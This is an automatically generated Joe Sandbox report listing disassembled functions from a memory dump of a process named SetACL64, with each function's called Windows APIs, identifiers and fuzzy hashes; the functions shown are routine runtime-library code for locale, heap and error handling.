                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Resource$FindFreeLoadLockQueryValue_invalid_parameter_noinfo_noreturn
                                                  • String ID:
                                                  • API String ID: 678723381-0
                                                  • Opcode ID: ccf424d7a3e64a52a3ff587554103de86ea84168affc70f79e39ce00dd8ec87e
                                                  • Instruction ID: 198e129940faf41a43d76aa0e235e77ae99b113cc6548edbf98ed704ad1255fc
                                                  • Opcode Fuzzy Hash: ccf424d7a3e64a52a3ff587554103de86ea84168affc70f79e39ce00dd8ec87e
                                                  • Instruction Fuzzy Hash: 7641A822A1878181EB109F25E44436DB361EB89BF4F945234EB9E07BA6DF7CF190C710
                                                  Function 00007FF7C1757EB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: InfoLocaletry_get_function
                                                  • String ID: GetLocaleInfoEx
                                                  • API String ID: 2200034068-2904428671
                                                  • Opcode ID: 591c11f87c398ef623a2c4855596f7f13eeda1a7201aaa3cd71a990fcb1b3bf8
                                                  • Instruction ID: e82ac975011b394a33a0b498356f93f87d4f5b09e22956d2cf96328c8bb3aee6
                                                  • Opcode Fuzzy Hash: 591c11f87c398ef623a2c4855596f7f13eeda1a7201aaa3cd71a990fcb1b3bf8
                                                  • Instruction Fuzzy Hash: 73016225B08B4282E701EF13E4404AAE761AF88BE0FD48436DE4C17B56CF7CD5418790
                                                  Function 00007FF7C174EA10 Relevance: 4.8, APIs: 3, Instructions: 317COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: memcpy_s
                                                  • String ID:
                                                  • API String ID: 1502251526-0
                                                  • Opcode ID: e968225ff8479ec0e065da208cfe27b2d7ffdba7a15fb48c526d8961649b34dc
                                                  • Instruction ID: 2b463269db531a66be71f71c00484431cd5a1b836e62d84ceb351598b965e05b
                                                  • Opcode Fuzzy Hash: e968225ff8479ec0e065da208cfe27b2d7ffdba7a15fb48c526d8961649b34dc
                                                  • Instruction Fuzzy Hash: ECC1C072B1829687EB34DF1AA144A6AF791FB887A4F84C138DB4A43745DE7CE841CF50
                                                  Function 00007FF7C175A31C Relevance: 3.2, APIs: 2, Instructions: 232COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise_clrfp
                                                  • String ID:
                                                  • API String ID: 15204871-0
                                                  • Opcode ID: 0895176a6f24f428c0ae16b17dcf63319d29ac092c4d084468464062deae3fc8
                                                  • Instruction ID: 3643b97f930188feaeb4de94ea52db056dc681a0475ccbe4a9936311f9d28c98
                                                  • Opcode Fuzzy Hash: 0895176a6f24f428c0ae16b17dcf63319d29ac092c4d084468464062deae3fc8
                                                  • Instruction Fuzzy Hash: 8AB17A73600B848BEB15CF2AC89636CBBA0F788B98F558831DA5D877A5CB79D851C710
                                                  Function 00007FF7C174F394 Relevance: 1.9, APIs: 1, Instructions: 371COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: Info
                                                  • String ID:
                                                  • API String ID: 1807457897-0
                                                  • Opcode ID: 792fdeddd26baa4f880f1e9171fac507b88ae362b99da9cf721e5e6e0f82d93c
                                                  • Instruction ID: 3ca8fe6273bc5b270f6d5e18e428b87fd58ea5843ec0d65e37cdc2235c38d75d
                                                  • Opcode Fuzzy Hash: 792fdeddd26baa4f880f1e9171fac507b88ae362b99da9cf721e5e6e0f82d93c
                                                  • Instruction Fuzzy Hash: B512DB22A08BC186E752DF3994542FDB3A4FB5C758F858235EB9C86693EF78E184C710
                                                  Function 00007FF7C1754218 Relevance: 1.8, APIs: 1, Instructions: 336COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e74242c9a7abf6f32fc219a05861dfe70c98d66e5ae6c6018350fa30fc1cf71a
                                                  • Instruction ID: f8c980b2087ec70e17a7d0d06635fb1be8bf8765c046247415a12b55988becb9
                                                  • Opcode Fuzzy Hash: e74242c9a7abf6f32fc219a05861dfe70c98d66e5ae6c6018350fa30fc1cf71a
                                                  • Instruction Fuzzy Hash: DDE16D32A08F8185E710EB62E4506FA77A4FB98798F814A32DF5D57782EF78D254D310
                                                  Function 00007FF7C1763C64 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _get_daylight_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 474895018-0
                                                  • Opcode ID: 42818a656ba6ab8851ffb2ca6ee8ba788b28637204efe2d9c2507415ecd12c88
                                                  • Instruction ID: 151533c849b805aa05d5c09372cd7c9cbd4aaec881863b9ee8b258daf93c522e
                                                  • Opcode Fuzzy Hash: 42818a656ba6ab8851ffb2ca6ee8ba788b28637204efe2d9c2507415ecd12c88
                                                  • Instruction Fuzzy Hash: A371C632B0858245F7646E2B8840679E291AF5D370F948635DA6D86ED7DFBDE840C730
                                                  Function 00007FF7C1757340 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF7C1753E64: GetLastError.KERNEL32(?,?,?,00007FF7C17499DD), ref: 00007FF7C1753E73
                                                    • Part of subcall function 00007FF7C1753E64: SetLastError.KERNEL32(?,?,?,00007FF7C17499DD), ref: 00007FF7C1753F11
                                                  • GetLocaleInfoW.KERNEL32 ref: 00007FF7C17573A8
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale
                                                  • String ID:
                                                  • API String ID: 3736152602-0
                                                  • Opcode ID: 95196c644f9699b70877d59c2ca76c71c45bc80ef89ac16a2cac59d7183ffe7d
                                                  • Instruction ID: 94e2274e6ee6a5657ffd8af7512a3b4f0c56314a19a6562fc8334312fd9a77c0
                                                  • Opcode Fuzzy Hash: 95196c644f9699b70877d59c2ca76c71c45bc80ef89ac16a2cac59d7183ffe7d
                                                  • Instruction Fuzzy Hash: 46318231A08A8286EB24EF27E4513ADB7A1FB4C794FD08135DA5D83697DFBCE4118750
                                                  Function 00007FF7C1757548 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF7C1753E64: GetLastError.KERNEL32(?,?,?,00007FF7C17499DD), ref: 00007FF7C1753E73
                                                    • Part of subcall function 00007FF7C1753E64: SetLastError.KERNEL32(?,?,?,00007FF7C17499DD), ref: 00007FF7C1753F11
                                                  • GetLocaleInfoW.KERNEL32(?,?,?,00007FF7C17572F1), ref: 00007FF7C175757F
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale
                                                  • String ID:
                                                  • API String ID: 3736152602-0
                                                  • Opcode ID: 49da2eb39f98338b10d953fea960edfff0511e9b01e2e80171c98adcd5d1bcf9
                                                  • Instruction ID: 5ba7b1983dbe4939bcd9376003d30c314d64ac74b82118ffda09b334980765a0
                                                  • Opcode Fuzzy Hash: 49da2eb39f98338b10d953fea960edfff0511e9b01e2e80171c98adcd5d1bcf9
                                                  • Instruction Fuzzy Hash: E7110A32A1C9D682E764EF139060679A2A1EB48778FE44135DB2E076C6DE7DD881C750
                                                  Function 00007FF7C175791C Relevance: 1.5, APIs: 1, Instructions: 32COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF7C1757D71,?,?,?,?,?,?,?,?,00000000,00007FF7C17565D8), ref: 00007FF7C175796B
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2099609381-0
                                                  • Opcode ID: 50e1e414d65792309ee3aaeac2ef96dc1d2e2a6e8bc8ede1a31a07ac19fd8208
                                                  • Instruction ID: a5d046fc766c8f5a6a0c5d12ce0befec789321059e5629a5a721c87ca2e098ad
                                                  • Opcode Fuzzy Hash: 50e1e414d65792309ee3aaeac2ef96dc1d2e2a6e8bc8ede1a31a07ac19fd8208
                                                  • Instruction Fuzzy Hash: AEF06D76B08B4183E704EF2AE8501A9A3A1FB9DBA0F948035DA4D8336ACF7CD461C700
                                                  Function 00007FF7C1759718 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: -
                                                  • API String ID: 0-2547889144
                                                  • Opcode ID: 4c1d9a599cc3bcd7ac7ed3d62c53db48a1b6c212b4efefffed7360049bb86f53
                                                  • Instruction ID: c6469e1aca130b35e509198a177f9ddaf1e25b3219ae16134ccdb81bc54b0f7f
                                                  • Opcode Fuzzy Hash: 4c1d9a599cc3bcd7ac7ed3d62c53db48a1b6c212b4efefffed7360049bb86f53
                                                  • Instruction Fuzzy Hash: 0161D822A0CB8685EB609F26941437AF791FB9D7B4F844636DA9D43BDADF7CD4008710
                                                  Function 00007FF7C175B74C Relevance: 1.4, APIs: 1, Instructions: 137COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32 ref: 00007FF7C175B7F1
                                                    • Part of subcall function 00007FF7C1754FDC: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7C175403D,?,?,000083BA01AAD97A,00007FF7C174E201,?,?,?,?,00007FF7C175BCFA,?,?,00000000), ref: 00007FF7C1755031
                                                    • Part of subcall function 00007FF7C1755054: HeapFree.KERNEL32(?,?,00007FF7C17534C7,00007FF7C1754ADC,?,?,?,00007FF7C1754E5F,?,?,000083BA01AAD97A,00007FF7C1755874,?,?,?,00007FF7C17557A7), ref: 00007FF7C175506A
                                                    • Part of subcall function 00007FF7C1755054: GetLastError.KERNEL32(?,?,00007FF7C17534C7,00007FF7C1754ADC,?,?,?,00007FF7C1754E5F,?,?,000083BA01AAD97A,00007FF7C1755874,?,?,?,00007FF7C17557A7), ref: 00007FF7C175507C
                                                    • Part of subcall function 00007FF7C1760AE0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C1760B0E
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorHeapLast$AllocateFree_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3806578645-0
                                                  • Opcode ID: 236d067f2956afbf2aae570a2df2c0c1b3f574b24111cde6df56e15b0652df38
                                                  • Instruction ID: 90c134a23f0a524b9919c52ba9e43abd44e1ecceaed18f4d4c8cf2b72532df93
                                                  • Opcode Fuzzy Hash: 236d067f2956afbf2aae570a2df2c0c1b3f574b24111cde6df56e15b0652df38
                                                  • Instruction Fuzzy Hash: 5F41F421B09A4309EB60BF27647167AE282AF8C7A4FD45135EE4D47783EE7CF4018760
                                                  Function 00007FF7C175D744 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: HeapProcess
                                                  • String ID:
                                                  • API String ID: 54951025-0
                                                  • Opcode ID: 227af5b2b01adeec9a4c4bb0160e400c0b56438fa23b95ceffa25b2c6b663f7a
                                                  • Instruction ID: f44d0547735f39f378bd0e20f26552d7cc33e62882f34ac9c90264ffd7a4da92
                                                  • Opcode Fuzzy Hash: 227af5b2b01adeec9a4c4bb0160e400c0b56438fa23b95ceffa25b2c6b663f7a
                                                  • Instruction Fuzzy Hash: ABB09220F07A0AC2EB087F226C4231863A57F4D720FD94038C00D82321EF6C20BA4720
                                                  Function 00007FF7C174FB00 Relevance: .6, Instructions: 634COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 804cbed04cb1b024b7a53ade8bd45d4e88f9643a1cf6792c7eebf2e20a23fd07
                                                  • Instruction ID: 18d2fae4f7ee1f22a8cb3d9e8f86a56996bed7b7ec32399fae78b56dfe06eaa0
                                                  • Opcode Fuzzy Hash: 804cbed04cb1b024b7a53ade8bd45d4e88f9643a1cf6792c7eebf2e20a23fd07
                                                  • Instruction Fuzzy Hash: AB627721D3DE5695E353AF379421535A324BF5A3E0F819373E80E77662DFACE8428620
                                                  Function 00007FF7C170F650 Relevance: .6, Instructions: 563COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID:
                                                  • API String ID: 2573137834-0
                                                  • Opcode ID: db6c7db9ba73bacb7339c37cc7ab61be6a1ca176040ca25b453e64a39fde0fd1
                                                  • Instruction ID: 5efde27d237ed497d462b74d24a6deef2505364c855ab61c174839a4b256797e
                                                  • Opcode Fuzzy Hash: db6c7db9ba73bacb7339c37cc7ab61be6a1ca176040ca25b453e64a39fde0fd1
                                                  • Instruction Fuzzy Hash: 7732AE22704B8586DB20EF26D9902ADA761FB89FD8F858032DF4E57BA9DF78D541C310
                                                  Function 00007FF7C170CB20 Relevance: .5, Instructions: 483COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1bddaa04ba479b5e3c122ea19f61bbb641f9d70ba39f3eaafaf3c5aa2504da0b
                                                  • Instruction ID: 04002e13f1b42932b649e0b6618a3dfcceeb19970f2b04fd47e30e497bd2d146
                                                  • Opcode Fuzzy Hash: 1bddaa04ba479b5e3c122ea19f61bbb641f9d70ba39f3eaafaf3c5aa2504da0b
                                                  • Instruction Fuzzy Hash: D212A162609B8182DB20EF26D4542BDB760FB89F64F858136CB8E07B96DFBDD145C320
                                                  Function 00007FF7C17163E0 Relevance: .3, Instructions: 330COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8cc424a777be5028136a971fc0df0c9e471f88d56c3a3877931117becaa86a14
                                                  • Instruction ID: 4869eb97bbda6540b9cb37136d3d6beec4e7c17407f4603d89346a667b661134
                                                  • Opcode Fuzzy Hash: 8cc424a777be5028136a971fc0df0c9e471f88d56c3a3877931117becaa86a14
                                                  • Instruction Fuzzy Hash: 27D18D62A19B8580EF50EF06D050279B3A1FB88FA4FA54536EE8D07B59EFBCD452C350
                                                  Function 00007FF7C175669C Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
